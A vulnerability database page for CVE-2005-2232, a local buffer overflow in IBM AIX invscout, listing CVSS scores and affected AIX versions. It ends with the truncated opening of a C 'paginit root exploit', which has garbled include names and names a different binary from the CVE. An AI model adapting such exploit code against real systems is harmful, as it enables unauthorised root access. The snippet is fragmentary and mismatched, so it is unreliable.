4.6
CVSSv2

CVE-2005-2232

Published: 12/07/2005 Updated: 05/09/2008
CVSS v2 Base Score: 4.6 | Impact Score: 6.4 | Exploitability Score: 3.9
VMScore: 465
Vector: AV:L/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in invscout in IBM AIX 5.1.0 up to and including 5.3.0 might allow local users to execute arbitrary code via a long command line argument.

Vulnerable Product Search on Vulmon Subscribe to Product

ibm aix 5.3

ibm aix 5.1

ibm aix 5.2

Exploits

/* * * IBM AIX paginit root exploit * * I just wanted to play with PowerPC (Tested on 52) * * intropy (intropy <at> caughqorg) * */ #include <stdioh> #include <unistdh> #include <stdlibh> #include <stringh> #define DEBUG 1 #define BUFFERSIZE 8000 #define EGGSIZE 4003 #define NOP 0x60 #define A ...